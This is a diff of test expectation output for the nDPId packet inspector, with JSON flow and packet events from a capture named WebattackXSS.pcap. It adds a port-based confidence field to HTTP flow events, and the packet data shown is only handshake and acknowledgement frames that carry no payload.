 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8118,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":2,"flow_last_seen":1499347945720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347945720,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhiqh1kGM3aQRPaAScSDqdwAAAgQFtAQCCAoD5nR\/ATyjCwEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":3,"flow_last_seen":1499347945721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347945721,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sjhAAD4GE6CsEAABwKgKMoYqAFDdpBE9odZBjYAQAOWJfwAAAQEICgE8owsD5nR\/"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347815351,"flow_last_seen":1499347820846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32988,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347815351,"flow_last_seen":1499347820846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347815351,"flow_last_seen":1499347820846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347816657,"flow_last_seen":1499347821846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33002,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347816657,"flow_last_seen":1499347821846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33002,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347816657,"flow_last_seen":1499347821846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347819250,"flow_last_seen":1499347824846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33028,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347819250,"flow_last_seen":1499347824846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33028,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347819250,"flow_last_seen":1499347824846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347820510,"flow_last_seen":1499347825848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33042,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347820510,"flow_last_seen":1499347825848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33042,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347820510,"flow_last_seen":1499347825848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347823117,"flow_last_seen":1499347828846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33068,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347823117,"flow_last_seen":1499347828846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33068,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347823117,"flow_last_seen":1499347828846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347824426,"flow_last_seen":1499347829847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33082,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347824426,"flow_last_seen":1499347829847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33082,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347824426,"flow_last_seen":1499347829847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948042,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33082,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347948293,"flow_last_seen":1499347948293,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347948293,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":1,"flow_last_seen":1499347948293,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347948293,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EvlAAD4GstesEAABwKgKMoZEAFDGn7d3AAAAAKACchCzjQAAAgQFtAQCCAoBPKWOAAAAAAEDAwc="}
@@ -3326,15 +3326,15 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1499347957282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347957282,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82nJAAD4G612sEAABwKgKMoaiAFCv93QkAAAAAKACchAEYwAAAgQFtAQCCAoBPK5WAAAAAAEDAwc="}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8209,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":2,"flow_last_seen":1499347957283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347957283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhqLwUjy4r\/d0JaAScSBUhgAAAgQFtAQCCAoD5n\/KATyuVgEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":3,"flow_last_seen":1499347957283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347957283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02nNAAD4G62SsEAABwKgKMoaiAFCv93Ql8FI8uYAQAOXzjQAAAQEICgE8rlYD5n\/K"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347825732,"flow_last_seen":1499347830847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347958308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33096,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347825732,"flow_last_seen":1499347830847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347958308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33096,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347825732,"flow_last_seen":1499347830847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347958308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347828369,"flow_last_seen":1499347833848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347958308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33122,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347828369,"flow_last_seen":1499347833848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347958308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33122,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347828369,"flow_last_seen":1499347833848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347958308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33122,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347829667,"flow_last_seen":1499347834848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347958308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33136,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347829667,"flow_last_seen":1499347834848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347958308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347829667,"flow_last_seen":1499347834848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347958308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347832201,"flow_last_seen":1499347837849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347958308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33162,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347832201,"flow_last_seen":1499347837849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347958308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33162,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347832201,"flow_last_seen":1499347837849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347958308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347833462,"flow_last_seen":1499347838849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347958308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33176,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347833462,"flow_last_seen":1499347838849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347958308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33176,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347833462,"flow_last_seen":1499347838849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347958308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8221,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347958588,"flow_last_seen":1499347958588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347958588,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8221,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1499347958588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347958588,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iDdAAD4GPZmsEAABwKgKMoawAFCTxierAAAAAKACchBruQAAAgQFtAQCCAoBPK+cAAAAAAEDAwc="}
@@ -3364,15 +3364,15 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1499347967724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347967724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JnBAAD4Gn2CsEAABwKgKMocQAFDWSp74AAAAAKACchComwAAAgQFtAQCCAoBPLiIAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":2,"flow_last_seen":1499347967725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347967725,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhxDJR2HM1kqe+aAScSDwgwAAAgQFtAQCCAoD5on8ATy4iAEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":3,"flow_last_seen":1499347967725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347967725,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JnFAAD4Gn2esEAABwKgKMocQAFDWSp75yUdhzYAQAOWPiwAAAQEICgE8uIgD5on8"}
